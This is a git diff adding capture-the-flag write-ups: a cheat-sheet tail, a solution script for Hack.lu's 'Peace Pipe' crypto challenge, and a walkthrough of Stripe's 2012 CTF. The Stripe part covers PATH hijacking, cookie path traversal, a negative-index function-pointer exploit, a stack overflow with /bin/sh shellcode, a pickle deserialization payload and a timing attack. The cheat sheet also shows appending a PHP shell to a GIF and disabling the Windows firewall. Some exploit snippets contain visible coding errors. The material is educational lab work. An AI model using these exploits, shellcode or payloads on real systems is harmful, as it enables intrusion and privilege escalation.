data extractor: + +[ExifTool] is used for reading, writing, and manipulating image metadata: +```sh +$ tar -xf Image-ExifTool-9.74.tar.gz +$ cd Image-ExifTool-9.74/ +$ perl Makefile.PL +$ make test +$ sudo make install +$ exiftool IMAGEFILE +``` + +### MD5 Lookups + +Several hashes in this CTF needed to be searched. Google, in general, does a good job, but here are some specific websites: [hash-killer] and [md5this]. + + +[hash-killer]: http://hash-killer.com/ +[md5this]: http://www.md5this.com/ + + +### In the Shell + +* **Hexadecimal decoders** are essential. You can use Python's [hex](https://docs.python.org/2/library/functions.html#hex): + +```sh +$ python -c 'print "2f722f6e6574736563".decode("hex")' +/r/netsec +``` + +or command line [xxd]: + +```sh +$ yum install vim-common +$ xxd -r -p <<< 2f722f6e6574736563 +/r/netsec +``` + +* **Base64 decoders** are also essential: + +```sh +$ base64 --decode <<< BASE64STRING > OUTPUT +``` + +* **nmap**, obviously. You can use it in Python scripts, using the [subprocess](https://docs.python.org/2/library/subprocess.html) library: +```python +print "[*] Scanning for open ports using nmap" +subprocess.call("nmap -sS -sV -T4 -p 22-2048 " + base_URL, shell=True) +``` + + +* **tee** is nice to store and view the output of another command. It can be very useful with *curl*. A simple example: +```sh +$ ls | tee file +``` + + +* **chattr** is used to change the file attributes of a Linux file system. For example, the command ```chattr +i``` on a file make it not be able to be removed (useful for *zombie* processes hunting). + +* **nm** is useful for listing symbols from object files + + +* **md5 hashing** is used all the time: + +```sh +$ echo -n password | md5sum +5f4dcc3b5aa765d61d8327deb882cf99 +``` + + +* You might want to **append a shell code to an image** (for example, a GIF file): +```sh +$ cat PHP-shell.php >> fig.gif +``` + +* Now a special one: Windows! One of the trivia questions in this CTF. How to disable the Windows XP Firewall from the command line: +```sh +netsh firewall set opmode mode=DISABLE. +``` + + + +[tcpdump]: http://linux.die.net/man/8/tcpdump +[ExifTool]: http://www.sno.phy.queensu.ca/~phil/exiftool/index.html +[Exif]: http://en.wikipedia.org/wiki/Exchangeable_image_file_format +[writeups]: https://github.com/ctfs/write-ups/tree/master/d-ctf-2014/misc-100 +[xxd]: http://linuxcommand.org/man_pages/xxd1.html +[Natas post]: http://bt3gl.github.io/exploiting-the-web-in-20-lessons-natas.html \ No newline at end of file diff --git a/CTFs_and_WarGames/2014/Hack.lu/README.md b/CTFs_and_WarGames/2014/Hack.lu/README.md new file mode 100644 index 0000000..720cb2b --- /dev/null +++ b/CTFs_and_WarGames/2014/Hack.lu/README.md @@ -0,0 +1,257 @@ +# The Peace Pipe at Hack.lu's Final CTF 2014 + + +## Understanding the Problem + +The problem starts with this weird story: + + After a long day, you sit around a campfire in the wild wild web with a few Sioux you met today. + To celebrate friendship one of them takes out his wooden peace pipe and minutes later everyone seems to be pretty dizzy. + You remember that their war chief "Makawee" started something to say about a secret tipi filled with fire-water (the good stuff). But when he noticed your interest he immediately stopped talking. + You recall that "Makawee" spoke with "Wahkoowah" about that issue, but it ended with a fight. + Since then Makawee wouldn't talk to Wahkoowah anymore. While they argued "Chapawee" wrote something down. + Maybe you can exploit their dizzyness to find out the location of the tipi. + +Then it gives us three *ports* in the *host*. With the first one, we talk to **Chapawee**: + + wildwildweb.fluxfingers.net 1432 + +With the second, we talk to **Wankoowah**: + + wildwildweb.fluxfingers.net 1433 + + +Finally, with the third, we talk to **Makawee**: + + wildwildweb.fluxfingers.net 1434 + +It was obvious that this game was about fooling our fellow *stoned* native-Americans. + +### A Dialogue with Chapawee + +When we *netcat* to **Chapawee** he answers: +```sh +$ nc wildwildweb.fluxfingers.net 1432 +Hi I'm Chapawee. I know the truth about the stars +Say stars for more +``` + +We answer *stars* and get a funny menu: + +```sh + I can tell you the truth about + * constellation + * namestar [starname] [key_of_truth] Adds a public key to a user. + Existing users cannot be + overwritten. Input is + [a-f0-9]{1,700}. + * showstar [starname] Reads the public key from the + database. +``` + +The first option *constellation*, shows a very interesting scheme: + +![cyber](http://i.imgur.com/OzVjrVh.png) + +Choosing the options **namestar** we are able to pick a (new) name to add a key. Picking the option **showstar** we are able to see the key for some name (for example, for Wahkoowar, Makawee, or any new name we had added before). + +So, from the above scheme, we know: + +1. How a **message** (t) is created with someone's public key, a **random rational number** (r_w), and a given **modulo number** (p). The only unknown here is r_w, which is a rational number (Q). This mean that any plans to brute force the messages wouldn't work (however, if r_w was an integer, this task could be achieved). + +2. Everyone has a private key that is modulo p. We never learn anything about anyone's private keys. We just know that they could be of the order of p (which is a really large number, ~1E2048). + +3. Wahkoowah and Makawee have a shared secret key. The way they share this key without knowing each other's private key is by this tricky transformation: + +![cyber](http://i.imgur.com/TwxShK9.jpg) + +Notice that we can move the multiplications' modulo operation to the end, due to [this propriety](http://en.wikipedia.org/wiki/Modular_arithmetic#Congruence_relation). + + +In conclusion, all we need to do is to convince Wahkoowah that we are Makawee (by telling him we are Makawee, so he can use his public key, and by sending him a correct *t_m*). If this works, he will give us a token. Then, if we send this token to Makawee, we get our flag. + + + +### A Dialogue with Wankoowah + +Now, let's see what Wankoowah has to say: + +```sh +$ nc wildwildweb.fluxfingers.net 1433 +Hi, I'm Wahkoowah. Who are you? Too foggy... +``` + +We try a couple of possibilities to check the outputs: +```sh +$ nc wildwildweb.fluxfingers.net 1433 +Hi, I'm Wahkoowah. Who are you? Too foggy... +noone +Hi noone +Cannot find it... +Ncat: Broken pipe. + +$ nc wildwildweb.fluxfingers.net 1433 +Hi, I'm Wahkoowah. Who are you? Too foggy... +makawee +Oh its you, Im so sorry. Can we talk now? +This is your key of truth +50e7e1957c1786a9442f0c9f372ec19f74f52839e9e38849b47438153f9d2483213a43ad2d988fab4a8707922060aaefe6504a70637596fbcf9d58362b23e5d5e2177fd4e919b80437bab51eda931e065b6d66fce343d7cb2b7c1ca26214792d461895095ae58354af0dec6e63869007e23835892f26aabc96fe3d9084a829b4d6c5b92c6f3e0dd9a70cbd5c72d6434f2b94d21c3b0c58a288c140642b813ffb1b632bc358b3a6af0124902acd8792202c848de7f9d5d98bee51ca69040c8a2457ad3fa6276d6510701b9a875df612e035322cad06579a0a11f5e7cb4ebb7b69171c38585fc0f4fe07b0c889442397029d05dc801026a0648d7aa8c847420e9c +With magic I did this: +922a7f4b150eb83eab929e2a44bcbbb45435851262a6e7b84d2777d995ffbc315a2e57a580f4982797b45efde6d30b493880ecea33fe26e6c8ff636b75b7cb3f647f0c6f606249bc48ef09bd20738cf472bf47c7f52b9e11afcefc1548155637b0d2054d37cd74301e534208408074938ae4e7b54ef50fa0a39cb090dd34de7a4040024ba2394bac62262ccda529d2d69effe24338f0ec1b842539d2b89b081fa77a266a7c9f62c25d2a1ee1af3da8054d79d87ae88da61b8333e1fc195d2957341458700a3be70c98e1a8ab35bfe527ff6a2f255c66d753d03c59404993f1ed295a722bf1d0241eec9c01efe06e3cd5b845e84de3d29de17f9b68351bdc2d65 +We continue our conversation, right? + + +``` + +The *magic* is the message *t_w*, created with Makawee's public key. Wahkoowah then ask for *t_m*... + + +### A Dialogue with Makawee + +Let's see what Makawee has to say: + +```sh +$ nc wildwildweb.fluxfingers.net 1434 +Hi, I'm, Makawee, and you are? Too bright here... +noone +noone ... do I know you? +Cannot find it... + +Ncat: Broken pipe. + +$ nc wildwildweb.fluxfingers.net 1434 +Hi, I'm, Makawee, and you are? Too bright here... +wahkoowah +I dont talk to you anymore. That thing with my daughter... + +Ncat: Broken pipe. +``` + +Mmmm, we need to make Makawee use Wankoowah's key without him knowing it! + +Since Chapawee allows us to add keys to names, let's create some name with Wahkoowah's key (say "mrwhite") and send this to Makawee: + +```sh +$ nc wildwildweb.fluxfingers.net 1432 +Hi I'm Chapawee. I know the truth about the stars +Say stars for more +stars + + I can tell you the truth about + * stars + * constellation + * namestar [starname] [key_of_truth] Adds a public key to a user. + Existing users cannot be + overwritten. Input is + [a-f0-9]{1,700}. + * showstar [starname] Reads the public key from the + database. + +namestar mrwhite 218b783ec5676cbddd378ceb724820444599f22cdcfda0a5a195b3a8fbf4ab5c915703420ad3b84531c54b838b23858fb84fcaf04d4932d4b9ef861c7ae9b635c9d3f56dfb100aa47297afcd94df41efa9f5ecba6483c5328e43ec457027ee4efcecefa094a83945106d7da1878c1f47516c2f2578170eeb36955d8bd16e0d106f9e2effe9debff41e551db4ac2e87bc8a9378d8eadb042bee18f4ad72ab721833a27154a7318b8cbe6f98fb3c82da32d1688fdcdb718fb15d9d5e6276b037cef62d953c09b23ebe90d0b13f61cd1643e5e1b0a433d5e2522ec5a028817891b6df444e983e1e0ff2356044fea67c616dce6b4bd53b17ea8bc51ef816ab8f2d9e +Add the star to the sky... +Set the star for mrwhite: 218b783ec5676cbddd378ceb724820444599f22cdcfda0a5a195b3a8fbf4ab5c915703420ad3b84531c54b838b23858fb84fcaf04d4932d4b9ef861c7ae9b635c9d3f56dfb100aa47297afcd94df41efa9f5ecba6483c5328e43ec457027ee4efcecefa094a83945106d7da1878c1f47516c2f2578170eeb36955d8bd16e0d106f9e2effe9debff41e551db4ac2e87bc8a9378d8eadb042bee18f4ad72ab721833a27154a7318b8cbe6f98fb3c82da32d1688fdcdb718fb15d9d5e6276b037cef62d953c09b23ebe90d0b13f61cd1643e5e1b0a433d5e2522ec5a028817891b6df444e983e1e0ff2356044fea67c616dce6b4bd53b17ea8bc51ef816ab8f2d9e +``` + +Sending it to Makawee: +```sh +$ nc wildwildweb.fluxfingers.net 1434 +Hi, I'm, Makawee, and you are? Too bright here... +mrwhite +mrwhite ... do I know you? +Disguise does not help +``` + +Oh no, the plan did not work! We can't send **exactly** Wahkoowah's key! We need to be even more tricky... + + +## Crafting a Solution + +### Master in Disguising + +Every key in this problem is given by *mudulus p*. This means that we have infinite values that map to the same original key. My first attempt was to multiply the original key by p, so that, when it receives the modulo operation, it circles once more returning to the original value. + +It didn't work. The reason is that p is too large. When multiplied by the key (that is large itself) we loose precision and we don't go back to the original value. We need to keep the values in the same scale! + +Let's take a look again at the way the messages are generated: + +![cyber](http://i.imgur.com/Hz5uf7X.jpg) + +We notice that the public key is exponentiated by r_m. It means that, if r_m is an even number, two values of the public key are mapped to the same value of the final message: +pubk and -pubk. + +That's all we need! We are going to disguise Makawee by creating a *star* with the negative value of Wahkoowah's key. + + +### Automatizing the Process and getting the Flag! + + +All right, now we know how to make Wahkoowah and Makawee talk and how to get *t_m* and *t_w*. We are ready to generate the token that will lead us to the flag. + +Notice again that since these messages are generated with random numbers, they will differ each time. However, we know from above that they carry unique information that leads to a common key (and the flag). I wrote the following script to automatize the process: + +```python +import socket + +PORTm = 1434 +PORTw = 1433 +HOST = 'wildwildweb.fluxfingers.net' + +def peace_pipe(): + + """ Get the magic message from some user to calculate rm """ + # create sockets + sm = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sw = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + + # connect to w + sw.connect((HOST, PORTw)) + sw.recv(4096) + sw.send(b'makawee') + sw.recv(4096) + sec = sw.recv(4096) + tw = sec.split("did this:")[1].split("\n")[1].strip() + print "\nMagic from w to m: " + tw + + # connect to m + sm.connect((HOST, PORTm)) + sm.recv(4096) + sm.send(b'mrblack') + sm.recv(4096) + sec = sm.recv(4096) + tm = sec.split("did this:")[1].split("\n")[1].strip() + print "\nMagic from m to w: " + tm + + # send w's magic to m's + sm.send(tw) + print sm.recv(4096) + + # send m's magic to get the token + sw.send(tm) + token = sw.recv(4096) + token = token.split('\n')[1].strip() + print "Token is: " + token + + # finally, send token back to m + sm.send(token) + print sm.recv(4096) + + sm.close() + sw.close() + +if __name__ == "__main__": + peace_pipe() +``` + + +Running it leads us to the flag: +```sh +python 300_peace_pipe.py + +Magic from w to m: 2f2f5d280871947836e9b5665986c1b75e732d88ae3d464b65d24ea7e41c33c491060379ac4f3dc4a7231f43d6a11b5bfd3a780d8ac46bd1a4cfd99ac041434cb82c5941f17e68a4f180101ece166a1b4da6ea32d62455bd7472892ed9b67fe2122e0b331048e4a11d98422f04ec3063a3652a0e1a90e13a740905bb3a22c9b5e39d1e0fa97f10bff34d76243b9211afd1131b0f6e33d4d99c8069c462677ce67401214c943fee13252060aa02b8b1525ed0af8c9aa5ad5dee64dbb0c275dd6147754c7dfaf3218caf35d7837925215a04bb315e91441306ef0d29f0da733b7e4ac92b500dc522de11c5f5af58248ed5f762b854f40f0adf4b681a937d17a1c0 + +Magic from m to w: e9eedf64931d5f77f5d061a0f411f9d385144f33fe1419905fdb24a0537cc205a7f99e083f37f98af8553795f1a71f83b7924620790845c3a48bb71a9b70a0f9e5ab95dda40ec4e229bc6a6cd146779de74b7237e42d01e2538c093407165afc79776bbd9bcdefa1d9af27a39f17610b4b9060c2b0ca5203457061facdc68257433253366937cef469261492ac81c177f42f10beea386ddfa09069a5fa2ae2e39a41eeecebdba622b79231cd5f206d0a70c71aa3eb5f706a16c99173f79f97e7f3408b544df556e3779f6d49441c04d33438b9604392f90bca6c2a8c3181b12ec5d492ef2184b9db69fdd1b6247150e3b55f8ee65d113c5350b4b097abadddc9 +Bit more truth is missing + +Token is: 5QAWhcwSaQicM8LitDGz6To69sBtsO8ASL27zxql8hW8aziveW0B0epJz2PKIFo/K4A= +I knew you are able to see IT. Lets get drunk, I tell you where +flag{FreeBoozeForEverone-Party!} +``` diff --git a/CTFs_and_WarGames/2014/STRIPE_1-2-3/README.md b/CTFs_and_WarGames/2014/STRIPE_1-2-3/README.md new file mode 100644 index 0000000..7d848b2 --- /dev/null +++ b/CTFs_and_WarGames/2014/STRIPE_1-2-3/README.md @@ -0,0 +1,575 @@ +# The First Stripe CTF + +This post is about the first [Stripe](https://stripe.com/) CTF, which [happened at the beginning of 2012](https://stripe.com/blog/capture-the-flag-wrap-up). I was able to fully reproduce the game by using a [Live CD Image](http://www.janosgyerik.com/hacking-contest-on-a-live-cd/). Other options were [direct download and BitTorrent](https://stripe.com/blog/capture-the-flag-wrap-up). + +This CTF was composed of 6 levels, and its style was very similar to other Wargames I've talked about before in this blog (for instance, check [OverTheWire's](http://overthewire.org/wargames/) [Natas](http://bt3gl.github.io/exploiting-the-web-in-20-lessons-natas.html), [Narnia](http://bt3gl.github.io/smashing-the-stack-for-fun-or-wargames-narnia-0-4.html), and [Krypton](http://bt3gl.github.io/cryptography-war-beating-krypton.html)). + + + +--- +## Level 1: Environment Variables + +When I booted the image, I got this first message: + +![cyber](http://i.imgur.com/O9ixhUv.jpg) + +In the *level01* folder I found: + +* A [setuid](http://linux.die.net/man/2/setuid) binary (a binary with access rights that allow users to run executables with permissions of the owner or the group). + +* The C source code of this binary: + +![cyber](http://i.imgur.com/DgB55I8.jpg) + +Checking the code closely we notice the following lines: +``` + printf("Current time: "); + fflush(stdout); + system("date"); +``` + +A vulnerability becomes quite obvious! + +First, if you use ```printf``` to send a text without a trailing ```\n``` to **stdout** (the screen), there is no guarantee that any of the text will appear so [fflush](http://man7.org/linux/man-pages/man3/fflush.3.html) is used to write everything that is buffered to **stdout**. + +Second, ```system``` executes [any shell command you pass to it](http://linux.die.net/man/3/system). In the case above, it will find a command through the [PATH environment variable](http://en.wikipedia.org/wiki/PATH_%28variable%29). + +It's clear that if we manage to change the variable ```date``` to some controlled exploit (such as ```cat /home/level01/.password```) we get the program to print the password. + +Third, ```system``` outputs the date using a **relative path** for the **PATH**. We just need to change that to the directory where we keep our exploit (*e.g.*, ```pwd```) to have the system *forget* about the original date function. + + The final script that leads to the next level's password looks like this: + +``` +#!/bin/sh +cd /tmp +echo '/bin/cat /home/level01/.password > date' +chmod +x date +export PATH=`pwd`:$PATH +/levels/level01/level01 +``` + +--- +## Level 2: Client's Cookies + +This level is about finding a vulnerability in a PHP script that greets the user with her/his saved data. + +The program implements this functionality by setting a cookie that saves the user's username and age. In future visits to the page, the program is then able to print *You’re NAME, and your age is AGE*. + +Inspecting closely the code we see that the client's cookie is read without sanitizing its content: + +``` + +``` +And then the results of this read is printed: +``` + +

+ +``` + +An obvious way to exploit this vulnerability is by building our own [request](http://www.w3.org/Protocols/rfc2616/rfc2616-sec5.html) that makes the program read the password at */home/level02/.password*. + +The cookie is set in the client side so we have lots of freedom to exploit it. For instance, we could use [Burp Suite](http://portswigger.net/burp/) to intercept the request and add the crafted cookie header. We could also use [Chrome Webinspector](https://chrome.google.com/webstore/detail/web-inspector/enibedkmbpadhfofcgjcphipflcbpelf?hl=en) to copy the [Authorization header](http://en.wikipedia.org/wiki/Basic_access_authentication) for the same purpose. The Cookie header would look like: + +``` +Cookie: user_details=../../home/level02/.password +``` + +Interestingly, it is also possible to solve this problem with just one instruction in the command line: + +``` +$ curl --user level01:$(cat /home/level01/.password) --digest -b "user_details=../../home/level02/.password" localhost:8002/level02.php +``` + +Where the flag **--digest** enables HTTP authentication, and the flags **-b** or **--cookie** let us determine the cookie to be sent. + +Note: In the LiveCD this level is modified to use Python and [Flask](http://flask.pocoo.org/docs/0.10/). Luckily, I had some previous experience in Flask (check out my [Anti-Social Network]()) and it was pretty easy to spot that the Pyhton code does *exactly* the same thing as the one above. + + + +--- +## Level 3: Failure in Input Validation + +The third level comes with another **setuid** binary with the purpose of modifying a string: + +``` +$ /levels/level03 + Usage: ./level03 INDEX STRING + Possible indices: + [0] to_upper [1] to_lower + [2] capitalize [3] length +``` + +The C code is also given: + +``` + +#define NUM_FNS 4 + +typedef int (*fn_ptr)(const char *); + +int to_upper(const char *str) +{(...)} + +int to_lower(const char *str) +{(...)} + +int capitalize(const char *str) +{(...)} + +int length(const char *str) +{(...)} + +int run(const char *str) +{ + // This function is now deprecated. + return system(str); +} + +int truncate_and_call(fn_ptr *fns, int index, char *user_string) +{ + char buf[64]; + // Truncate supplied string + strncpy(buf, user_string, sizeof(buf) - 1); + buf[sizeof(buf) - 1] = '\0'; + return fns[index](buf); +} + +int main(int argc, char **argv) +{ + int index; + fn_ptr fns[NUM_FNS] = {&to_upper, &to_lower, &capitalize, &length}; + + if (argc != 3) { + printf("Usage: ./level03 INDEX STRING\n"); + printf("Possible indices:\n[0] to_upper\t[1] to_lower\n"); + printf("[2] capitalize\t[3] length\n"); + exit(-1); + } + + // Parse supplied index + index = atoi(argv[1]); + + if (index >= NUM_FNS) { + printf("Invalid index.\n"); + printf("Possible indices:\n[0] to_upper\t[1] to_lower\n"); + printf("[2] capitalize\t[3] length\n"); + exit(-1); + } + + return truncate_and_call(fns, index, argv[2]); +} +``` + +In problems like this, the attack surface is usually any place where there is input from the user. For this reason, our approach is to take a look at the arguments taken in the main function, checking for the common memory and overflow vulnerabilities in C. + +A vulnerability is found in the failure of checking for negative inputs: + +``` +#define NUM_FNS 4 +(...) + // Parse supplied index + index = atoi(argv[1]); + if (index >= NUM_FNS) { + (...) + exit(-1); +} +``` + +Moreover, the **index** variable is used in the function **truncate_and_call**, where the function **fns** can be overflowed: + +``` +typedef int (*fn_ptr)(const char *); +(...) +fn_ptr fns[NUM_FNS] = {&to_upper, &to_lower, &capitalize, &length}; +(...) +int truncate_and_call(fn_ptr *fns, int index, char *user_string) +{ + char buf[64]; + // Truncate supplied string + strncpy(buf, user_string, sizeof(buf) - 1); + buf[sizeof(buf) - 1] = '\0'; + return fns[index](buf); +} +``` + +The exploitation plan becomes easier when we notice that right before **truncate_and_call** we have this convenient function: + +``` +int run(const char *str) +{ + return system(str); +} +``` + + + +### Description of the Exploit + +To understand this problem we need to understand the [design of the stack frame](http://bt3gl.github.io/smashing-the-stack-for-fun-or-wargames-narnia-0-4.html). With this in mind, the exploit is crafted as follows: + +1) We input a malicious index that is negative (so it pass the bound checking) to have a shell running ```system("/bin/sh");``` (which will be able to read password of level3 because it will have its [UID](http://en.wikipedia.org/wiki/User_identifier_(Unix))). + + +2) We first need to find the memory location before **fns** (which should be writable). We fire up **gdb** and search for the pointer to **buf**, which is right before **fns** (this is different each time due to [ASLR](http://en.wikipedia.org/wiki/Address_space_layout_randomization)): + +``` +(gdb) p &buf + (char (*)[64]) 0xffbffa00 +``` + +3) We check **index** (where 4 is **sizeof(*fns)**), and subtract **buf** from to the pointer to **fns**: + +``` +(gdb) p (0xffbffa6c - 0xffbffa00)/4 + 27 +``` +So running an argument such as */level/level03 -27 foo* calls **fns[-27]** which is **&fns-27** times the size of the pointer. + + +4) We will assign **buf** to a shellcode that will spawn the privileged terminal using the function **run**, which is at: + +``` +(gdb) p &run + (int (*)(const char *)) 0x80484ac +``` + +5) Stripe's machines were [little-endian](http://en.wikipedia.org/wiki/Endianness) so the address of **run** is **\xac\x84\x04\x08**. We write the memory location of **&run** into **buf**, since **buf** is just a ```strcpy``` of the second argument. In the end, we want to call: + +``` +$ run('\xac\x84\x04\x08'); +``` + +6) Running it with the length of the directory (remember that the function pointer must start on a multiple of 4 characters) gives our password: + +``` +$ /levels/level03 -21 "cat /home/level03/.password $(printf '\xac\x84\x04\x08') +``` + + + + +--- +## Level 4: Classic Stack Overflow + +Level 4 is about a classical Stack Overflow problem. Once again we get a **setuid** binary, together with the following code: + +``` +void fun(char *str) +{ + char buf[1024]; + strcpy(buf, str); +} + +int main(int argc, char **argv) +{ + if (argc != 2) { + printf("Usage: ./level04 STRING"); + exit(-1); + } + fun(argv[1]); + printf("Oh no! That didn't work!\n"); + return 0; +} +``` + +In this challenge, the input string is received by the function **fun**, and then it is copied to the buffer. Since ```strcp``` does not perform bounds checking, if our string is larger than 1024 characters, it will keep copying until it reaches a NULL byte (0x00). This [overflows the stack](http://phrack.org/issues/49/14.html#article) and makes it possible to rewrite the **function return address**. + +The input for the **fun** function is going to be 1024 bytes (which starts at **&buf**) with several [NOPs](http://en.wikipedia.org/wiki/NOP) plus the shellcode. The overflowed bytes have pointers to the address of **buf** (**&buf**). We use NOPs because the system uses stack randomization. If **&buf** points to any of the NOPs, the shellcode will be executed. + + +### Yet Another Shellcode Introduction + +Shellcode can either be crafted directly in Assembly or reproduced in C and then disassembled in **gdb** and **objdump**. The second approach is more prone to errors. + +Let's write the simplest shellcode we can think of, which simply spawns a shell: + +``` +#include +int main() +{ + char *array[2]; + array[0] = "/bin/sh"; + array[1] = NULL; + execve(array[0], array, NULL); + exit(0); +} +``` + +With the following **Makefile** (I tend to write Makefiles for anything I compile in C): +``` +shell: simplest_shellcode.c + gcc -static -g -o shell simplest_shellcode.c +``` + +Running **make** will give us our executable **shell**. Now, let's fire up **gdb**: + +``` +$ gdb shell +(gdb) disas main +Dump of assembler code for function main: + 0x00000000004004d0 <+0>: push %rbp + 0x00000000004004d1 <+1>: mov %rsp,%rbp + 0x00000000004004d4 <+4>: sub $0x10,%rsp + 0x00000000004004d8 <+8>: movq $0x482be4,-0x10(%rbp) + 0x00000000004004e0 <+16>: movq $0x0,-0x8(%rbp) + 0x00000000004004e8 <+24>: mov -0x10(%rbp),%rax + 0x00000000004004ec <+28>: lea -0x10(%rbp),%rcx + 0x00000000004004f0 <+32>: mov $0x0,%edx + 0x00000000004004f5 <+37>: mov %rcx,%rsi + 0x00000000004004f8 <+40>: mov %rax,%rdi + 0x00000000004004fb <+43>: callq 0x40c540 + 0x0000000000400500 <+48>: mov $0x0,%edi + 0x0000000000400505 <+53>: callq 0x400e60 +End of assembler dump. +``` + +The first line is updating the frame stack pointer (**%rsp**), moving it to the top of the stack: +``` +0x00000000004004d0 <+0>: push %rbp +0x00000000004004d1 <+1>: mov %rsp,%rbp +``` + + +Then it subtracts 16 bytes from **%rsp**, with 8 bytes of padding: +``` +0x00000000004004d4 <+4>: sub $0x10,%rsp +``` + +We see this address **0x482be4** being moved to **%rsp**: +``` +0x00000000004004d8 <+8>: movq $0x482be4,-0x10(%rbp) +``` + +It should be a pointer to ```/bin/sh```, and we can be sure by asking gdb: +``` +(gdb) x/1s 0x482be4 +0x482be4: "/bin/sh" +``` + +After that, **NULL** is pushed in: +``` +0x00000000004004f0 <+32>: mov $0x0,%edx +``` + +Finally, **execve** is executed: +``` +0x00000000004004fb <+43>: callq 0x40c540 +``` + +### Writing the Shellcode in Assembly + +Now we are able to reproduce the code in Assembly. This is important: Stripe's machine was 32-bit, and the Assembly instructions are different from 64-bit (for instance, check the 64-bit shellcode I showed [here](http://bt3gl.github.io/smashing-the-stack-for-fun-or-wargames-narnia-0-4.html)). + +With an **l** added to the words, the above shellcode in 32-bit machines is: + +``` +.text +.globl _start + +_start: + xorl %eax, %eax /* make eax equal to 0*/ + pushl %eax /* pushes null*/ + pushl $0x68732f2f /* push //sh */ + pushl $0x6e69622f /* push /bin */ + movl %esp, %ebx /* store /bin/sh */ + pushl %eax /* use null*/ + pushl %ebx /* use /bin/sh*/ + movl %esp, %ecx /* wrutes array */ + xorl %edx, %edx /* xor to make edx equal to 0 */ + movb $0xb, %al /* execve system call #11 */ + int $0x80 /* make an interrupt */ +``` + +To assemble and link this in a 32-bit machine, we do: + +``` +$ as -o shell.o shell.s +$ ld -m -o shell shell.o +``` + +In a 64-but machine, we do: + +1. Add **.code32** in the top of the Assembly code. +2. Assemble with the **--32 flag**. +3. Link with the **-m elf_i386** flag. + +Resulting in: + +``` +$ as --32 -o shell.o shell.s +$ ld -m elf_i386 -o shell shell.o +``` + +Now, the last step is to get the executable **shell** in hexadecimal so we have the instructions for the shellcode. We use **objdump**: + +``` +$ objdump -d shell +shell: file format elf32-i386 +Disassembly of section .text: +08048054 <_start>: + 8048054: 31 c0 xor %eax,%eax + 8048056: 50 push %eax + 8048057: 68 2f 2f 73 68 push $0x68732f2f + 804805c: 68 2f 62 69 6e push $0x6e69622f + 8048061: 89 e3 mov %esp,%ebx + 8048063: 50 push %eax + 8048064: 53 push %ebx + 8048065: 89 e1 mov %esp,%ecx + 8048067: 31 d2 xor %edx,%edx + 8048069: b0 0b mov $0xb,%al + 804806b: cd 80 int $0x80 +``` + +Which in the little-endian representation is: +``` +\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 +``` + + +### Solving the Problem + +Now, all we need to do is write a snippet in any language which takes that shellcode and some NOPs to overflow the stack of the *level04*'s' binary. We write the exploit in Python: + +```py +import struct, subprocess + +STACK = 0x0804857b +NOP = \x90 +SHELLCODE = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" +EXPLOIT = NOP * (1024 - len(SHELLCODE)) + SHELLCODE + +stack_ptr = struct.pack("**. This will run some Python code that will give us the password when unpickled. A great module for this task is [Python's os.system](https://docs.python.org/2/library/os.html#os.system), which executes commands in a subshell. + + + +An example of exploit in Python is the following: + +```py +import pickle, os +HOST = 'localhost:9020' + +os.system("/usr/bin/curl", ['', HOST, '-d', \ + "bla; job: cos\nsystem\n(S'cat /home/level05/.password \ + > /tmp/pass'\ntR."], {}) +``` + + + + + +--- +## Level 6: Timing Attack + + +And we have reached the sixth level! + +The goal in this level is to read the password from */home/the-flag/.password*. To complete this challenge, another **setuid** binary is given, which can be used to guess the password: + +``` +$ ./level06 /home/the-flag/.password banana + Welcome to the password checker! +$ Ha ha, your password is incorrect! +``` + +This turns out to be a case of [Timing Attack](http://en.wikipedia.org/wiki/Timing_attack), where we are able to detect the output in **stderr** and in **stdout** to find the characters that form the password (by checking the response to wrong characters). + +But there is a twist! + +The program works as the following: for every input character, a loop is executed. A dot is printed after each character comparison. If the guess is wrong, the system forks a child process and runs a little slower (each loop has complexity O(n^2) to the guess size, where the maximum size is **MAX_ARG_STRLEN ~ 0.1 MB**). + + +There are several [elegant solutions in the Internet](https://github.com/stripe-ctf/stripe-ctf/blob/master/code/level06/level06.c), but a very simple possible shell exploit is the shown: + +``` +#!\bin\bash +for c in {A..Z} {a..z} {0..9}; do +echo $c +head -c35 file & sleep 0.1 +/levels/level06 /home/the-flag/.password "$c"A 2> file +done +``` + +**And we get our flag! Fun! :) ** + + +--- + +## References + +* [Andy Brody's Post](https://stripe.com/blog/capture-the-flag-wrap-up) +* [Stripe CTF Repository](https://github.com/stripe-ctf) +* Pickle Modules is unsafe! [Here](https://blog.nelhage.com/2011/03/exploiting-pickle/) and [here](http://penturalabs.wordpress.com/2011/03/17/python-cpickle-allows-for-arbitrary-code-execution/). +* Some other writeups: [here](http://blog.delroth.net/2012/03/my-stripe-ctf-writeup/), [here](https://khr0x40sh.wordpress.com/2012/02/), [here](http://du.nham.ca/blog/posts/2012/03/20/stripe-ctf/), and [here](https://isisblogs.poly.edu/2012/03/23/stripe-ctf-level01/). + + +-------------- + diff --git a/CTFs_and_WarGames/CTFs-RECON.md b/CTFs_and_WarGames/CTFs-RECON.md index 439d074..845ec1a 100644 --- a/CTFs_and_WarGames/CTFs-RECON.md +++ b/CTFs_and_WarGames/CTFs-RECON.md @@ -1,8 +1,6 @@ # Recon - - ### Searching the Internets The recon problems usually give you someone/something's name and a task or a hint to find some specific information about it. So the first thing is of course google it. @@ -29,6 +27,7 @@ Google anything using keywords such as ```filetype:cgi inurl:cgi-bin``` - [redbot.org](https://redbot.org/) - [shodan.io](https://www.shodan.io/) - [censys.io](https://censys.io/) + ----------------- [FireBug]: http://getfirebug.com/ [Burp Suite]: http://portswigger.net/burp/ diff --git a/CTFs_and_WarGames/WARGAMES/README.md b/CTFs_and_WarGames/WARGAMES/README.md index 00495d3..57c57d0 100644 --- a/CTFs_and_WarGames/WARGAMES/README.md +++ b/CTFs_and_WarGames/WARGAMES/README.md @@ -1,3 +1,9 @@ -## Writeups: +# Wargames Writeups -[Narnia 1-5]: http://bt3gl.github.io/smashing-the-stack-for-fun-or-wargames-narnia-0-4.html +### OverTheWire + +[Wargames]: http://overthewire.org/wargames/ + +* krypton +* narnia +* natas diff --git a/CTFs_and_WarGames/WARGAMES/krypton/README.md b/CTFs_and_WarGames/WARGAMES/krypton/README.md new file mode 100644 index 0000000..b249f5a --- /dev/null +++ 